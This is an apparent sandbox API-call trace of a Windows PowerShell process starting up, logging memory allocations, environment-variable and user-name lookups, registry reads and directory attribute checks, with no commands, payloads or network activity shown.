	[0603.969] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3293f70*="Registry", lpRawData=0x3293d00) returned 1
	[0604.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.235] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0604.235] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d428) returned 0x1
	[0604.236] CoTaskMemFree (pv=0x34dfb0) 
	[0604.236] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0604.236] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d468) returned 1
	[0604.236] CoTaskMemFree (pv=0x368dd0) 
	[0604.237] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3299388*="Variable", lpRawData=0x3299118) returned 1
	[0604.239] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0604.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.239] CoTaskMemFree (pv=0x38e630) 
	[0604.242] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0604.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.242] CoTaskMemFree (pv=0x38e630) 
	[0604.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0604.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0604.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0604.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0605.380] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0605.380] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d428) returned 0x1
	[0605.380] CoTaskMemFree (pv=0x34dfb0) 
	[0605.380] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0605.380] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d468) returned 1
	[0605.381] CoTaskMemFree (pv=0x368dd0) 
	[0605.381] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32acfa0*="Certificate", lpRawData=0x32acd30) returned 1
	[0606.377] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0606.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.377] CoTaskMemFree (pv=0x38e630) 
	[0606.379] CoTaskMemAlloc (cb=0x20e) returned 0x3b8b60
	[0606.379] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3b8b60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0606.379] CoTaskMemFree (pv=0x3b8b60) 
	[0606.380] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0606.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.380] CoTaskMemFree (pv=0x38e630) 
	[0606.380] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0606.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.380] CoTaskMemFree (pv=0x38e630) 
	[0606.394] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0606.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.394] CoTaskMemFree (pv=0x38e630) 
	[0606.398] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0606.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.398] CoTaskMemFree (pv=0x38e630) 
	[0606.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.399] SetErrorMode (uMode=0x1) returned 0x1
	[0606.400] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d070 | out: lpFileInformation=0x22d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0606.400] SetErrorMode (uMode=0x1) returned 0x1
	[0606.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.400] SetErrorMode (uMode=0x1) returned 0x1
	[0606.400] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d070 | out: lpFileInformation=0x22d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0606.400] SetErrorMode (uMode=0x1) returned 0x1
	[0606.401] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0606.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.401] CoTaskMemFree (pv=0x38e630) 
	[0606.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.406] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0606.406] SetErrorMode (uMode=0x1) returned 0x1
	[0606.407] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d030 | out: lpFileInformation=0x22d030*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0606.407] SetErrorMode (uMode=0x1) returned 0x1
	[0606.407] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0606.407] SetErrorMode (uMode=0x1) returned 0x1
	[0606.407] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d030 | out: lpFileInformation=0x22d030*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0606.407] SetErrorMode (uMode=0x1) returned 0x1
	[0606.407] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22ce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0606.407] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0606.407] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0606.407] SetErrorMode (uMode=0x1) returned 0x1
	[0606.408] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22d030 | out: lpFileInformation=0x22d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0606.408] SetErrorMode (uMode=0x1) returned 0x1
	[0606.408] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0606.408] SetErrorMode (uMode=0x1) returned 0x1
	[0606.408] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22d030 | out: lpFileInformation=0x22d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0606.408] SetErrorMode (uMode=0x1) returned 0x1
	[0606.408] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0606.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x22cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0606.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.408] SetErrorMode (uMode=0x1) returned 0x1
	[0606.409] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d030 | out: lpFileInformation=0x22d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0606.409] SetErrorMode (uMode=0x1) returned 0x1
	[0606.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.409] SetErrorMode (uMode=0x1) returned 0x1
	[0606.409] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d030 | out: lpFileInformation=0x22d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0606.409] SetErrorMode (uMode=0x1) returned 0x1
	[0606.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x22cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.410] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0606.410] SetErrorMode (uMode=0x1) returned 0x1
	[0606.410] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22d070 | out: lpFileInformation=0x22d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0606.410] SetErrorMode (uMode=0x1) returned 0x1
	[0606.410] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0606.410] SetErrorMode (uMode=0x1) returned 0x1
	[0606.410] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22d070 | out: lpFileInformation=0x22d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0606.410] SetErrorMode (uMode=0x1) returned 0x1
	[0606.410] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0606.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x22cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0606.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.411] SetErrorMode (uMode=0x1) returned 0x1
	[0606.411] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d070 | out: lpFileInformation=0x22d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0606.411] SetErrorMode (uMode=0x1) returned 0x1
	[0606.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.411] SetErrorMode (uMode=0x1) returned 0x1
	[0606.411] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d070 | out: lpFileInformation=0x22d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0606.411] SetErrorMode (uMode=0x1) returned 0x1
	[0606.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x22cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0606.414] SetErrorMode (uMode=0x1) returned 0x1
	[0606.414] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d330 | out: lpFileInformation=0x22d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0606.414] SetErrorMode (uMode=0x1) returned 0x1
	[0607.410] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0607.410] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d698 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d698) returned 0x1
	[0607.410] CoTaskMemFree (pv=0x34dfb0) 
	[0607.410] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0607.410] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d6d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d6d8) returned 1
	[0607.410] CoTaskMemFree (pv=0x368dd0) 
	[0607.411] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32e5c88*="Available", lpRawData=0x32e5a18) returned 1
	[0607.437] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0607.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.437] CoTaskMemFree (pv=0x38e630) 
	[0607.437] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0607.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.438] CoTaskMemFree (pv=0x38e630) 
	[0607.439] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0607.439] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0607.439] CoTaskMemFree (pv=0x38e630) 
	[0607.439] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0607.439] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0607.440] CoTaskMemFree (pv=0x38e630) 
	[0607.441] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x30c) returned 0x0
	[0607.441] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d63c, lpData=0x0, lpcbData=0x22d638*=0x0 | out: lpType=0x22d63c*=0x1, lpData=0x0, lpcbData=0x22d638*=0x56) returned 0x0
	[0607.442] CoTaskMemAlloc (cb=0x5a) returned 0x1b7ca300
	[0607.442] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d60c, lpData=0x1b7ca300, lpcbData=0x22d608*=0x56 | out: lpType=0x22d60c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d608*=0x56) returned 0x0
	[0607.442] CoTaskMemFree (pv=0x1b7ca300) 
	[0607.442] RegCloseKey (hKey=0x30c) returned 0x0
	[0607.443] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0607.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.443] CoTaskMemFree (pv=0x38e630) 
	[0608.389] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0608.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.389] CoTaskMemFree (pv=0x38e630) 
	[0608.397] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0608.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.400] CoTaskMemFree (pv=0x38e630) 
	[0608.401] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0608.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.401] CoTaskMemFree (pv=0x38e630) 
	[0608.401] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0608.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.401] CoTaskMemFree (pv=0x38e630) 
	[0608.402] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0608.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.402] CoTaskMemFree (pv=0x38e630) 
	[0608.404] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0608.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.404] CoTaskMemFree (pv=0x38e630) 
	[0608.404] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0608.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.405] CoTaskMemFree (pv=0x38e630) 
	[0609.682] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0609.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.603] CoTaskMemFree (pv=0x38e630) 
	[0612.403] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x38ea70
	[0612.412] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x38eb80
	[0616.930] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0616.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.930] CoTaskMemFree (pv=0x38ec90) 
	[0616.935] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0616.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.935] CoTaskMemFree (pv=0x38ec90) 
	[0616.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
